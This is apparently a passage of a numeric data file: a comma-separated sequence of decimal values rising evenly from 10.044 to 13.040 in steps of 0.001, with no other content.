10.044, 10.045, 10.046, 10.047, 10.048, 10.049, 10.050, 10.051, 10.052,
10.053, 10.054, 10.055, 10.056, 10.057, 10.058, 10.059, 10.060, 10.061,
10.062, 10.063, 10.064, 10.065, 10.066, 10.067, 10.068, 10.069, 10.070,
10.071, 10.072, 10.073, 10.074, 10.075, 10.076, 10.077, 10.078, 10.079,
10.080, 10.081, 10.082, 10.083, 10.084, 10.085, 10.086, 10.087, 10.088,
10.089, 10.090, 10.091, 10.092, 10.093, 10.094, 10.095, 10.096, 10.097,
10.098, 10.099, 10.100, 10.101, 10.102, 10.103, 10.104, 10.105, 10.106,
10.107, 10.108, 10.109, 10.110, 10.111, 10.112, 10.113, 10.114, 10.115,
10.116, 10.117, 10.118, 10.119, 10.120, 10.121, 10.122, 10.123, 10.124,
10.125, 10.126, 10.127, 10.128, 10.129, 10.130, 10.131, 10.132, 10.133,
10.134, 10.135, 10.136, 10.137, 10.138, 10.139, 10.140, 10.141, 10.142,
10.143, 10.144, 10.145, 10.146, 10.147, 10.148, 10.149, 10.150, 10.151,
10.152, 10.153, 10.154, 10.155, 10.156, 10.157, 10.158, 10.159, 10.160,
10.161, 10.162, 10.163, 10.164, 10.165, 10.166, 10.167, 10.168, 10.169,
10.170, 10.171, 10.172, 10.173, 10.174, 10.175, 10.176, 10.177, 10.178,
10.179, 10.180, 10.181, 10.182, 10.183, 10.184, 10.185, 10.186, 10.187,
10.188, 10.189, 10.190, 10.191, 10.192, 10.193, 10.194, 10.195, 10.196,
10.197, 10.198, 10.199, 10.200, 10.201, 10.202, 10.203, 10.204, 10.205,
10.206, 10.207, 10.208, 10.209, 10.210, 10.211, 10.212, 10.213, 10.214,
10.215, 10.216, 10.217, 10.218, 10.219, 10.220, 10.221, 10.222, 10.223,
10.224, 10.225, 10.226, 10.227, 10.228, 10.229, 10.230, 10.231, 10.232,
10.233, 10.234, 10.235, 10.236, 10.237, 10.238, 10.239, 10.240, 10.241,
10.242, 10.243, 10.244, 10.245, 10.246, 10.247, 10.248, 10.249, 10.250,
10.251, 10.252, 10.253, 10.254, 10.255, 10.256, 10.257, 10.258, 10.259,
10.260, 10.261, 10.262, 10.263, 10.264, 10.265, 10.266, 10.267, 10.268,
10.269, 10.270, 10.271, 10.272, 10.273, 10.274, 10.275, 10.276, 10.277,
10.278, 10.279, 10.280, 10.281, 10.282, 10.283, 10.284, 10.285, 10.286,
10.287, 10.288, 10.289, 10.290, 10.291, 10.292, 10.293, 10.294, 10.295,
10.296, 10.297, 10.298, 10.299, 10.300, 10.301, 10.302, 10.303, 10.304,
10.305, 10.306, 10.307, 10.308, 10.309, 10.310, 10.311, 10.312, 10.313,
10.314, 10.315, 10.316, 10.317, 10.318, 10.319, 10.320, 10.321, 10.322,
10.323, 10.324, 10.325, 10.326, 10.327, 10.328, 10.329, 10.330, 10.331,
10.332, 10.333, 10.334, 10.335, 10.336, 10.337, 10.338, 10.339, 10.340,
10.341, 10.342, 10.343, 10.344, 10.345, 10.346, 10.347, 10.348, 10.349,
10.350, 10.351, 10.352, 10.353, 10.354, 10.355, 10.356, 10.357, 10.358,
10.359, 10.360, 10.361, 10.362, 10.363, 10.364, 10.365, 10.366, 10.367,
10.368, 10.369, 10.370, 10.371, 10.372, 10.373, 10.374, 10.375, 10.376,
10.377, 10.378, 10.379, 10.380, 10.381, 10.382, 10.383, 10.384, 10.385,
10.386, 10.387, 10.388, 10.389, 10.390, 10.391, 10.392, 10.393, 10.394,
10.395, 10.396, 10.397, 10.398, 10.399, 10.400, 10.401, 10.402, 10.403,
10.404, 10.405, 10.406, 10.407, 10.408, 10.409, 10.410, 10.411, 10.412,
10.413, 10.414, 10.415, 10.416, 10.417, 10.418, 10.419, 10.420, 10.421,
10.422, 10.423, 10.424, 10.425, 10.426, 10.427, 10.428, 10.429, 10.430,
10.431, 10.432, 10.433, 10.434, 10.435, 10.436, 10.437, 10.438, 10.439,
10.440, 10.441, 10.442, 10.443, 10.444, 10.445, 10.446, 10.447, 10.448,
10.449, 10.450, 10.451, 10.452, 10.453, 10.454, 10.455, 10.456, 10.457,
10.458, 10.459, 10.460, 10.461, 10.462, 10.463, 10.464, 10.465, 10.466,
10.467, 10.468, 10.469, 10.470, 10.471, 10.472, 10.473, 10.474, 10.475,
10.476, 10.477, 10.478, 10.479, 10.480, 10.481, 10.482, 10.483, 10.484,
10.485, 10.486, 10.487, 10.488, 10.489, 10.490, 10.491, 10.492, 10.493,
10.494, 10.495, 10.496, 10.497, 10.498, 10.499, 10.500, 10.501, 10.502,
10.503, 10.504, 10.505, 10.506, 10.507, 10.508, 10.509, 10.510, 10.511,
10.512, 10.513, 10.514, 10.515, 10.516, 10.517, 10.518, 10.519, 10.520,
10.521, 10.522, 10.523, 10.524, 10.525, 10.526, 10.527, 10.528, 10.529,
10.530, 10.531, 10.532, 10.533, 10.534, 10.535, 10.536, 10.537, 10.538,
10.539, 10.540, 10.541, 10.542, 10.543, 10.544, 10.545, 10.546, 10.547,
10.548, 10.549, 10.550, 10.551, 10.552, 10.553, 10.554, 10.555, 10.556,
10.557, 10.558, 10.559, 10.560, 10.561, 10.562, 10.563, 10.564, 10.565,
10.566, 10.567, 10.568, 10.569, 10.570, 10.571, 10.572, 10.573, 10.574,
10.575, 10.576, 10.577, 10.578, 10.579, 10.580, 10.581, 10.582, 10.583,
10.584, 10.585, 10.586, 10.587, 10.588, 10.589, 10.590, 10.591, 10.592,
10.593, 10.594, 10.595, 10.596, 10.597, 10.598, 10.599, 10.600, 10.601,
10.602, 10.603, 10.604, 10.605, 10.606, 10.607, 10.608, 10.609, 10.610,
10.611, 10.612, 10.613, 10.614, 10.615, 10.616, 10.617, 10.618, 10.619,
10.620, 10.621, 10.622, 10.623, 10.624, 10.625, 10.626, 10.627, 10.628,
10.629, 10.630, 10.631, 10.632, 10.633, 10.634, 10.635, 10.636, 10.637,
10.638, 10.639, 10.640, 10.641, 10.642, 10.643, 10.644, 10.645, 10.646,
10.647, 10.648, 10.649, 10.650, 10.651, 10.652, 10.653, 10.654, 10.655,
10.656, 10.657, 10.658, 10.659, 10.660, 10.661, 10.662, 10.663, 10.664,
10.665, 10.666, 10.667, 10.668, 10.669, 10.670, 10.671, 10.672, 10.673,
10.674, 10.675, 10.676, 10.677, 10.678, 10.679, 10.680, 10.681, 10.682,
10.683, 10.684, 10.685, 10.686, 10.687, 10.688, 10.689, 10.690, 10.691,
10.692, 10.693, 10.694, 10.695, 10.696, 10.697, 10.698, 10.699, 10.700,
10.701, 10.702, 10.703, 10.704, 10.705, 10.706, 10.707, 10.708, 10.709,
10.710, 10.711, 10.712, 10.713, 10.714, 10.715, 10.716, 10.717, 10.718,
10.719, 10.720, 10.721, 10.722, 10.723, 10.724, 10.725, 10.726, 10.727,
10.728, 10.729, 10.730, 10.731, 10.732, 10.733, 10.734, 10.735, 10.736,
10.737, 10.738, 10.739, 10.740, 10.741, 10.742, 10.743, 10.744, 10.745,
10.746, 10.747, 10.748, 10.749, 10.750, 10.751, 10.752, 10.753, 10.754,
10.755, 10.756, 10.757, 10.758, 10.759, 10.760, 10.761, 10.762, 10.763,
10.764, 10.765, 10.766, 10.767, 10.768, 10.769, 10.770, 10.771, 10.772,
10.773, 10.774, 10.775, 10.776, 10.777, 10.778, 10.779, 10.780, 10.781,
10.782, 10.783, 10.784, 10.785, 10.786, 10.787, 10.788, 10.789, 10.790,
10.791, 10.792, 10.793, 10.794, 10.795, 10.796, 10.797, 10.798, 10.799,
10.800, 10.801, 10.802, 10.803, 10.804, 10.805, 10.806, 10.807, 10.808,
10.809, 10.810, 10.811, 10.812, 10.813, 10.814, 10.815, 10.816, 10.817,
10.818, 10.819, 10.820, 10.821, 10.822, 10.823, 10.824, 10.825, 10.826,
10.827, 10.828, 10.829, 10.830, 10.831, 10.832, 10.833, 10.834, 10.835,
10.836, 10.837, 10.838, 10.839, 10.840, 10.841, 10.842, 10.843, 10.844,
10.845, 10.846, 10.847, 10.848, 10.849, 10.850, 10.851, 10.852, 10.853,
10.854, 10.855, 10.856, 10.857, 10.858, 10.859, 10.860, 10.861, 10.862,
10.863, 10.864, 10.865, 10.866, 10.867, 10.868, 10.869, 10.870, 10.871,
10.872, 10.873, 10.874, 10.875, 10.876, 10.877, 10.878, 10.879, 10.880,
10.881, 10.882, 10.883, 10.884, 10.885, 10.886, 10.887, 10.888, 10.889,
10.890, 10.891, 10.892, 10.893, 10.894, 10.895, 10.896, 10.897, 10.898,
10.899, 10.900, 10.901, 10.902, 10.903, 10.904, 10.905, 10.906, 10.907,
10.908, 10.909, 10.910, 10.911, 10.912, 10.913, 10.914, 10.915, 10.916,
10.917, 10.918, 10.919, 10.920, 10.921, 10.922, 10.923, 10.924, 10.925,
10.926, 10.927, 10.928, 10.929, 10.930, 10.931, 10.932, 10.933, 10.934,
10.935, 10.936, 10.937, 10.938, 10.939, 10.940, 10.941, 10.942, 10.943,
10.944, 10.945, 10.946, 10.947, 10.948, 10.949, 10.950, 10.951, 10.952,
10.953, 10.954, 10.955, 10.956, 10.957, 10.958, 10.959, 10.960, 10.961,
10.962, 10.963, 10.964, 10.965, 10.966, 10.967, 10.968, 10.969, 10.970,
10.971, 10.972, 10.973, 10.974, 10.975, 10.976, 10.977, 10.978, 10.979,
10.980, 10.981, 10.982, 10.983, 10.984, 10.985, 10.986, 10.987, 10.988,
10.989, 10.990, 10.991, 10.992, 10.993, 10.994, 10.995, 10.996, 10.997,
10.998, 10.999, 11.000, 11.001, 11.002, 11.003, 11.004, 11.005, 11.006,
11.007, 11.008, 11.009, 11.010, 11.011, 11.012, 11.013, 11.014, 11.015,
11.016, 11.017, 11.018, 11.019, 11.020, 11.021, 11.022, 11.023, 11.024,
11.025, 11.026, 11.027, 11.028, 11.029, 11.030, 11.031, 11.032, 11.033,
11.034, 11.035, 11.036, 11.037, 11.038, 11.039, 11.040, 11.041, 11.042,
11.043, 11.044, 11.045, 11.046, 11.047, 11.048, 11.049, 11.050, 11.051,
11.052, 11.053, 11.054, 11.055, 11.056, 11.057, 11.058, 11.059, 11.060,
11.061, 11.062, 11.063, 11.064, 11.065, 11.066, 11.067, 11.068, 11.069,
11.070, 11.071, 11.072, 11.073, 11.074, 11.075, 11.076, 11.077, 11.078,
11.079, 11.080, 11.081, 11.082, 11.083, 11.084, 11.085, 11.086, 11.087,
11.088, 11.089, 11.090, 11.091, 11.092, 11.093, 11.094, 11.095, 11.096,
11.097, 11.098, 11.099, 11.100, 11.101, 11.102, 11.103, 11.104, 11.105,
11.106, 11.107, 11.108, 11.109, 11.110, 11.111, 11.112, 11.113, 11.114,
11.115, 11.116, 11.117, 11.118, 11.119, 11.120, 11.121, 11.122, 11.123,
11.124, 11.125, 11.126, 11.127, 11.128, 11.129, 11.130, 11.131, 11.132,
11.133, 11.134, 11.135, 11.136, 11.137, 11.138, 11.139, 11.140, 11.141,
11.142, 11.143, 11.144, 11.145, 11.146, 11.147, 11.148, 11.149, 11.150,
11.151, 11.152, 11.153, 11.154, 11.155, 11.156, 11.157, 11.158, 11.159,
11.160, 11.161, 11.162, 11.163, 11.164, 11.165, 11.166, 11.167, 11.168,
11.169, 11.170, 11.171, 11.172, 11.173, 11.174, 11.175, 11.176, 11.177,
11.178, 11.179, 11.180, 11.181, 11.182, 11.183, 11.184, 11.185, 11.186,
11.187, 11.188, 11.189, 11.190, 11.191, 11.192, 11.193, 11.194, 11.195,
11.196, 11.197, 11.198, 11.199, 11.200, 11.201, 11.202, 11.203, 11.204,
11.205, 11.206, 11.207, 11.208, 11.209, 11.210, 11.211, 11.212, 11.213,
11.214, 11.215, 11.216, 11.217, 11.218, 11.219, 11.220, 11.221, 11.222,
11.223, 11.224, 11.225, 11.226, 11.227, 11.228, 11.229, 11.230, 11.231,
11.232, 11.233, 11.234, 11.235, 11.236, 11.237, 11.238, 11.239, 11.240,
11.241, 11.242, 11.243, 11.244, 11.245, 11.246, 11.247, 11.248, 11.249,
11.250, 11.251, 11.252, 11.253, 11.254, 11.255, 11.256, 11.257, 11.258,
11.259, 11.260, 11.261, 11.262, 11.263, 11.264, 11.265, 11.266, 11.267,
11.268, 11.269, 11.270, 11.271, 11.272, 11.273, 11.274, 11.275, 11.276,
11.277, 11.278, 11.279, 11.280, 11.281, 11.282, 11.283, 11.284, 11.285,
11.286, 11.287, 11.288, 11.289, 11.290, 11.291, 11.292, 11.293, 11.294,
11.295, 11.296, 11.297, 11.298, 11.299, 11.300, 11.301, 11.302, 11.303,
11.304, 11.305, 11.306, 11.307, 11.308, 11.309, 11.310, 11.311, 11.312,
11.313, 11.314, 11.315, 11.316, 11.317, 11.318, 11.319, 11.320, 11.321,
11.322, 11.323, 11.324, 11.325, 11.326, 11.327, 11.328, 11.329, 11.330,
11.331, 11.332, 11.333, 11.334, 11.335, 11.336, 11.337, 11.338, 11.339,
11.340, 11.341, 11.342, 11.343, 11.344, 11.345, 11.346, 11.347, 11.348,
11.349, 11.350, 11.351, 11.352, 11.353, 11.354, 11.355, 11.356, 11.357,
11.358, 11.359, 11.360, 11.361, 11.362, 11.363, 11.364, 11.365, 11.366,
11.367, 11.368, 11.369, 11.370, 11.371, 11.372, 11.373, 11.374, 11.375,
11.376, 11.377, 11.378, 11.379, 11.380, 11.381, 11.382, 11.383, 11.384,
11.385, 11.386, 11.387, 11.388, 11.389, 11.390, 11.391, 11.392, 11.393,
11.394, 11.395, 11.396, 11.397, 11.398, 11.399, 11.400, 11.401, 11.402,
11.403, 11.404, 11.405, 11.406, 11.407, 11.408, 11.409, 11.410, 11.411,
11.412, 11.413, 11.414, 11.415, 11.416, 11.417, 11.418, 11.419, 11.420,
11.421, 11.422, 11.423, 11.424, 11.425, 11.426, 11.427, 11.428, 11.429,
11.430, 11.431, 11.432, 11.433, 11.434, 11.435, 11.436, 11.437, 11.438,
11.439, 11.440, 11.441, 11.442, 11.443, 11.444, 11.445, 11.446, 11.447,
11.448, 11.449, 11.450, 11.451, 11.452, 11.453, 11.454, 11.455, 11.456,
11.457, 11.458, 11.459, 11.460, 11.461, 11.462, 11.463, 11.464, 11.465,
11.466, 11.467, 11.468, 11.469, 11.470, 11.471, 11.472, 11.473, 11.474,
11.475, 11.476, 11.477, 11.478, 11.479, 11.480, 11.481, 11.482, 11.483,
11.484, 11.485, 11.486, 11.487, 11.488, 11.489, 11.490, 11.491, 11.492,
11.493, 11.494, 11.495, 11.496, 11.497, 11.498, 11.499, 11.500, 11.501,
11.502, 11.503, 11.504, 11.505, 11.506, 11.507, 11.508, 11.509, 11.510,
11.511, 11.512, 11.513, 11.514, 11.515, 11.516, 11.517, 11.518, 11.519,
11.520, 11.521, 11.522, 11.523, 11.524, 11.525, 11.526, 11.527, 11.528,
11.529, 11.530, 11.531, 11.532, 11.533, 11.534, 11.535, 11.536, 11.537,
11.538, 11.539, 11.540, 11.541, 11.542, 11.543, 11.544, 11.545, 11.546,
11.547, 11.548, 11.549, 11.550, 11.551, 11.552, 11.553, 11.554, 11.555,
11.556, 11.557, 11.558, 11.559, 11.560, 11.561, 11.562, 11.563, 11.564,
11.565, 11.566, 11.567, 11.568, 11.569, 11.570, 11.571, 11.572, 11.573,
11.574, 11.575, 11.576, 11.577, 11.578, 11.579, 11.580, 11.581, 11.582,
11.583, 11.584, 11.585, 11.586, 11.587, 11.588, 11.589, 11.590, 11.591,
11.592, 11.593, 11.594, 11.595, 11.596, 11.597, 11.598, 11.599, 11.600,
11.601, 11.602, 11.603, 11.604, 11.605, 11.606, 11.607, 11.608, 11.609,
11.610, 11.611, 11.612, 11.613, 11.614, 11.615, 11.616, 11.617, 11.618,
11.619, 11.620, 11.621, 11.622, 11.623, 11.624, 11.625, 11.626, 11.627,
11.628, 11.629, 11.630, 11.631, 11.632, 11.633, 11.634, 11.635, 11.636,
11.637, 11.638, 11.639, 11.640, 11.641, 11.642, 11.643, 11.644, 11.645,
11.646, 11.647, 11.648, 11.649, 11.650, 11.651, 11.652, 11.653, 11.654,
11.655, 11.656, 11.657, 11.658, 11.659, 11.660, 11.661, 11.662, 11.663,
11.664, 11.665, 11.666, 11.667, 11.668, 11.669, 11.670, 11.671, 11.672,
11.673, 11.674, 11.675, 11.676, 11.677, 11.678, 11.679, 11.680, 11.681,
11.682, 11.683, 11.684, 11.685, 11.686, 11.687, 11.688, 11.689, 11.690,
11.691, 11.692, 11.693, 11.694, 11.695, 11.696, 11.697, 11.698, 11.699,
11.700, 11.701, 11.702, 11.703, 11.704, 11.705, 11.706, 11.707, 11.708,
11.709, 11.710, 11.711, 11.712, 11.713, 11.714, 11.715, 11.716, 11.717,
11.718, 11.719, 11.720, 11.721, 11.722, 11.723, 11.724, 11.725, 11.726,
11.727, 11.728, 11.729, 11.730, 11.731, 11.732, 11.733, 11.734, 11.735,
11.736, 11.737, 11.738, 11.739, 11.740, 11.741, 11.742, 11.743, 11.744,
11.745, 11.746, 11.747, 11.748, 11.749, 11.750, 11.751, 11.752, 11.753,
11.754, 11.755, 11.756, 11.757, 11.758, 11.759, 11.760, 11.761, 11.762,
11.763, 11.764, 11.765, 11.766, 11.767, 11.768, 11.769, 11.770, 11.771,
11.772, 11.773, 11.774, 11.775, 11.776, 11.777, 11.778, 11.779, 11.780,
11.781, 11.782, 11.783, 11.784, 11.785, 11.786, 11.787, 11.788, 11.789,
11.790, 11.791, 11.792, 11.793, 11.794, 11.795, 11.796, 11.797, 11.798,
11.799, 11.800, 11.801, 11.802, 11.803, 11.804, 11.805, 11.806, 11.807,
11.808, 11.809, 11.810, 11.811, 11.812, 11.813, 11.814, 11.815, 11.816,
11.817, 11.818, 11.819, 11.820, 11.821, 11.822, 11.823, 11.824, 11.825,
11.826, 11.827, 11.828, 11.829, 11.830, 11.831, 11.832, 11.833, 11.834,
11.835, 11.836, 11.837, 11.838, 11.839, 11.840, 11.841, 11.842, 11.843,
11.844, 11.845, 11.846, 11.847, 11.848, 11.849, 11.850, 11.851, 11.852,
11.853, 11.854, 11.855, 11.856, 11.857, 11.858, 11.859, 11.860, 11.861,
11.862, 11.863, 11.864, 11.865, 11.866, 11.867, 11.868, 11.869, 11.870,
11.871, 11.872, 11.873, 11.874, 11.875, 11.876, 11.877, 11.878, 11.879,
11.880, 11.881, 11.882, 11.883, 11.884, 11.885, 11.886, 11.887, 11.888,
11.889, 11.890, 11.891, 11.892, 11.893, 11.894, 11.895, 11.896, 11.897,
11.898, 11.899, 11.900, 11.901, 11.902, 11.903, 11.904, 11.905, 11.906,
11.907, 11.908, 11.909, 11.910, 11.911, 11.912, 11.913, 11.914, 11.915,
11.916, 11.917, 11.918, 11.919, 11.920, 11.921, 11.922, 11.923, 11.924,
11.925, 11.926, 11.927, 11.928, 11.929, 11.930, 11.931, 11.932, 11.933,
11.934, 11.935, 11.936, 11.937, 11.938, 11.939, 11.940, 11.941, 11.942,
11.943, 11.944, 11.945, 11.946, 11.947, 11.948, 11.949, 11.950, 11.951,
11.952, 11.953, 11.954, 11.955, 11.956, 11.957, 11.958, 11.959, 11.960,
11.961, 11.962, 11.963, 11.964, 11.965, 11.966, 11.967, 11.968, 11.969,
11.970, 11.971, 11.972, 11.973, 11.974, 11.975, 11.976, 11.977, 11.978,
11.979, 11.980, 11.981, 11.982, 11.983, 11.984, 11.985, 11.986, 11.987,
11.988, 11.989, 11.990, 11.991, 11.992, 11.993, 11.994, 11.995, 11.996,
11.997, 11.998, 11.999, 12.000, 12.001, 12.002, 12.003, 12.004, 12.005,
12.006, 12.007, 12.008, 12.009, 12.010, 12.011, 12.012, 12.013, 12.014,
12.015, 12.016, 12.017, 12.018, 12.019, 12.020, 12.021, 12.022, 12.023,
12.024, 12.025, 12.026, 12.027, 12.028, 12.029, 12.030, 12.031, 12.032,
12.033, 12.034, 12.035, 12.036, 12.037, 12.038, 12.039, 12.040, 12.041,
12.042, 12.043, 12.044, 12.045, 12.046, 12.047, 12.048, 12.049, 12.050,
12.051, 12.052, 12.053, 12.054, 12.055, 12.056, 12.057, 12.058, 12.059,
12.060, 12.061, 12.062, 12.063, 12.064, 12.065, 12.066, 12.067, 12.068,
12.069, 12.070, 12.071, 12.072, 12.073, 12.074, 12.075, 12.076, 12.077,
12.078, 12.079, 12.080, 12.081, 12.082, 12.083, 12.084, 12.085, 12.086,
12.087, 12.088, 12.089, 12.090, 12.091, 12.092, 12.093, 12.094, 12.095,
12.096, 12.097, 12.098, 12.099, 12.100, 12.101, 12.102, 12.103, 12.104,
12.105, 12.106, 12.107, 12.108, 12.109, 12.110, 12.111, 12.112, 12.113,
12.114, 12.115, 12.116, 12.117, 12.118, 12.119, 12.120, 12.121, 12.122,
12.123, 12.124, 12.125, 12.126, 12.127, 12.128, 12.129, 12.130, 12.131,
12.132, 12.133, 12.134, 12.135, 12.136, 12.137, 12.138, 12.139, 12.140,
12.141, 12.142, 12.143, 12.144, 12.145, 12.146, 12.147, 12.148, 12.149,
12.150, 12.151, 12.152, 12.153, 12.154, 12.155, 12.156, 12.157, 12.158,
12.159, 12.160, 12.161, 12.162, 12.163, 12.164, 12.165, 12.166, 12.167,
12.168, 12.169, 12.170, 12.171, 12.172, 12.173, 12.174, 12.175, 12.176,
12.177, 12.178, 12.179, 12.180, 12.181, 12.182, 12.183, 12.184, 12.185,
12.186, 12.187, 12.188, 12.189, 12.190, 12.191, 12.192, 12.193, 12.194,
12.195, 12.196, 12.197, 12.198, 12.199, 12.200, 12.201, 12.202, 12.203,
12.204, 12.205, 12.206, 12.207, 12.208, 12.209, 12.210, 12.211, 12.212,
12.213, 12.214, 12.215, 12.216, 12.217, 12.218, 12.219, 12.220, 12.221,
12.222, 12.223, 12.224, 12.225, 12.226, 12.227, 12.228, 12.229, 12.230,
12.231, 12.232, 12.233, 12.234, 12.235, 12.236, 12.237, 12.238, 12.239,
12.240, 12.241, 12.242, 12.243, 12.244, 12.245, 12.246, 12.247, 12.248,
12.249, 12.250, 12.251, 12.252, 12.253, 12.254, 12.255, 12.256, 12.257,
12.258, 12.259, 12.260, 12.261, 12.262, 12.263, 12.264, 12.265, 12.266,
12.267, 12.268, 12.269, 12.270, 12.271, 12.272, 12.273, 12.274, 12.275,
12.276, 12.277, 12.278, 12.279, 12.280, 12.281, 12.282, 12.283, 12.284,
12.285, 12.286, 12.287, 12.288, 12.289, 12.290, 12.291, 12.292, 12.293,
12.294, 12.295, 12.296, 12.297, 12.298, 12.299, 12.300, 12.301, 12.302,
12.303, 12.304, 12.305, 12.306, 12.307, 12.308, 12.309, 12.310, 12.311,
12.312, 12.313, 12.314, 12.315, 12.316, 12.317, 12.318, 12.319, 12.320,
12.321, 12.322, 12.323, 12.324, 12.325, 12.326, 12.327, 12.328, 12.329,
12.330, 12.331, 12.332, 12.333, 12.334, 12.335, 12.336, 12.337, 12.338,
12.339, 12.340, 12.341, 12.342, 12.343, 12.344, 12.345, 12.346, 12.347,
12.348, 12.349, 12.350, 12.351, 12.352, 12.353, 12.354, 12.355, 12.356,
12.357, 12.358, 12.359, 12.360, 12.361, 12.362, 12.363, 12.364, 12.365,
12.366, 12.367, 12.368, 12.369, 12.370, 12.371, 12.372, 12.373, 12.374,
12.375, 12.376, 12.377, 12.378, 12.379, 12.380, 12.381, 12.382, 12.383,
12.384, 12.385, 12.386, 12.387, 12.388, 12.389, 12.390, 12.391, 12.392,
12.393, 12.394, 12.395, 12.396, 12.397, 12.398, 12.399, 12.400, 12.401,
12.402, 12.403, 12.404, 12.405, 12.406, 12.407, 12.408, 12.409, 12.410,
12.411, 12.412, 12.413, 12.414, 12.415, 12.416, 12.417, 12.418, 12.419,
12.420, 12.421, 12.422, 12.423, 12.424, 12.425, 12.426, 12.427, 12.428,
12.429, 12.430, 12.431, 12.432, 12.433, 12.434, 12.435, 12.436, 12.437,
12.438, 12.439, 12.440, 12.441, 12.442, 12.443, 12.444, 12.445, 12.446,
12.447, 12.448, 12.449, 12.450, 12.451, 12.452, 12.453, 12.454, 12.455,
12.456, 12.457, 12.458, 12.459, 12.460, 12.461, 12.462, 12.463, 12.464,
12.465, 12.466, 12.467, 12.468, 12.469, 12.470, 12.471, 12.472, 12.473,
12.474, 12.475, 12.476, 12.477, 12.478, 12.479, 12.480, 12.481, 12.482,
12.483, 12.484, 12.485, 12.486, 12.487, 12.488, 12.489, 12.490, 12.491,
12.492, 12.493, 12.494, 12.495, 12.496, 12.497, 12.498, 12.499, 12.500,
12.501, 12.502, 12.503, 12.504, 12.505, 12.506, 12.507, 12.508, 12.509,
12.510, 12.511, 12.512, 12.513, 12.514, 12.515, 12.516, 12.517, 12.518,
12.519, 12.520, 12.521, 12.522, 12.523, 12.524, 12.525, 12.526, 12.527,
12.528, 12.529, 12.530, 12.531, 12.532, 12.533, 12.534, 12.535, 12.536,
12.537, 12.538, 12.539, 12.540, 12.541, 12.542, 12.543, 12.544, 12.545,
12.546, 12.547, 12.548, 12.549, 12.550, 12.551, 12.552, 12.553, 12.554,
12.555, 12.556, 12.557, 12.558, 12.559, 12.560, 12.561, 12.562, 12.563,
12.564, 12.565, 12.566, 12.567, 12.568, 12.569, 12.570, 12.571, 12.572,
12.573, 12.574, 12.575, 12.576, 12.577, 12.578, 12.579, 12.580, 12.581,
12.582, 12.583, 12.584, 12.585, 12.586, 12.587, 12.588, 12.589, 12.590,
12.591, 12.592, 12.593, 12.594, 12.595, 12.596, 12.597, 12.598, 12.599,
12.600, 12.601, 12.602, 12.603, 12.604, 12.605, 12.606, 12.607, 12.608,
12.609, 12.610, 12.611, 12.612, 12.613, 12.614, 12.615, 12.616, 12.617,
12.618, 12.619, 12.620, 12.621, 12.622, 12.623, 12.624, 12.625, 12.626,
12.627, 12.628, 12.629, 12.630, 12.631, 12.632, 12.633, 12.634, 12.635,
12.636, 12.637, 12.638, 12.639, 12.640, 12.641, 12.642, 12.643, 12.644,
12.645, 12.646, 12.647, 12.648, 12.649, 12.650, 12.651, 12.652, 12.653,
12.654, 12.655, 12.656, 12.657, 12.658, 12.659, 12.660, 12.661, 12.662,
12.663, 12.664, 12.665, 12.666, 12.667, 12.668, 12.669, 12.670, 12.671,
12.672, 12.673, 12.674, 12.675, 12.676, 12.677, 12.678, 12.679, 12.680,
12.681, 12.682, 12.683, 12.684, 12.685, 12.686, 12.687, 12.688, 12.689,
12.690, 12.691, 12.692, 12.693, 12.694, 12.695, 12.696, 12.697, 12.698,
12.699, 12.700, 12.701, 12.702, 12.703, 12.704, 12.705, 12.706, 12.707,
12.708, 12.709, 12.710, 12.711, 12.712, 12.713, 12.714, 12.715, 12.716,
12.717, 12.718, 12.719, 12.720, 12.721, 12.722, 12.723, 12.724, 12.725,
12.726, 12.727, 12.728, 12.729, 12.730, 12.731, 12.732, 12.733, 12.734,
12.735, 12.736, 12.737, 12.738, 12.739, 12.740, 12.741, 12.742, 12.743,
12.744, 12.745, 12.746, 12.747, 12.748, 12.749, 12.750, 12.751, 12.752,
12.753, 12.754, 12.755, 12.756, 12.757, 12.758, 12.759, 12.760, 12.761,
12.762, 12.763, 12.764, 12.765, 12.766, 12.767, 12.768, 12.769, 12.770,
12.771, 12.772, 12.773, 12.774, 12.775, 12.776, 12.777, 12.778, 12.779,
12.780, 12.781, 12.782, 12.783, 12.784, 12.785, 12.786, 12.787, 12.788,
12.789, 12.790, 12.791, 12.792, 12.793, 12.794, 12.795, 12.796, 12.797,
12.798, 12.799, 12.800, 12.801, 12.802, 12.803, 12.804, 12.805, 12.806,
12.807, 12.808, 12.809, 12.810, 12.811, 12.812, 12.813, 12.814, 12.815,
12.816, 12.817, 12.818, 12.819, 12.820, 12.821, 12.822, 12.823, 12.824,
12.825, 12.826, 12.827, 12.828, 12.829, 12.830, 12.831, 12.832, 12.833,
12.834, 12.835, 12.836, 12.837, 12.838, 12.839, 12.840, 12.841, 12.842,
12.843, 12.844, 12.845, 12.846, 12.847, 12.848, 12.849, 12.850, 12.851,
12.852, 12.853, 12.854, 12.855, 12.856, 12.857, 12.858, 12.859, 12.860,
12.861, 12.862, 12.863, 12.864, 12.865, 12.866, 12.867, 12.868, 12.869,
12.870, 12.871, 12.872, 12.873, 12.874, 12.875, 12.876, 12.877, 12.878,
12.879, 12.880, 12.881, 12.882, 12.883, 12.884, 12.885, 12.886, 12.887,
12.888, 12.889, 12.890, 12.891, 12.892, 12.893, 12.894, 12.895, 12.896,
12.897, 12.898, 12.899, 12.900, 12.901, 12.902, 12.903, 12.904, 12.905,
12.906, 12.907, 12.908, 12.909, 12.910, 12.911, 12.912, 12.913, 12.914,
12.915, 12.916, 12.917, 12.918, 12.919, 12.920, 12.921, 12.922, 12.923,
12.924, 12.925, 12.926, 12.927, 12.928, 12.929, 12.930, 12.931, 12.932,
12.933, 12.934, 12.935, 12.936, 12.937, 12.938, 12.939, 12.940, 12.941,
12.942, 12.943, 12.944, 12.945, 12.946, 12.947, 12.948, 12.949, 12.950,
12.951, 12.952, 12.953, 12.954, 12.955, 12.956, 12.957, 12.958, 12.959,
12.960, 12.961, 12.962, 12.963, 12.964, 12.965, 12.966, 12.967, 12.968,
12.969, 12.970, 12.971, 12.972, 12.973, 12.974, 12.975, 12.976, 12.977,
12.978, 12.979, 12.980, 12.981, 12.982, 12.983, 12.984, 12.985, 12.986,
12.987, 12.988, 12.989, 12.990, 12.991, 12.992, 12.993, 12.994, 12.995,
12.996, 12.997, 12.998, 12.999, 13.000, 13.001, 13.002, 13.003, 13.004,
13.005, 13.006, 13.007, 13.008, 13.009, 13.010, 13.011, 13.012, 13.013,
13.014, 13.015, 13.016, 13.017, 13.018, 13.019, 13.020, 13.021, 13.022,
13.023, 13.024, 13.025, 13.026, 13.027, 13.028, 13.029, 13.030, 13.031,
13.032, 13.033, 13.034, 13.035, 13.036, 13.037, 13.038, 13.039, 13.040,
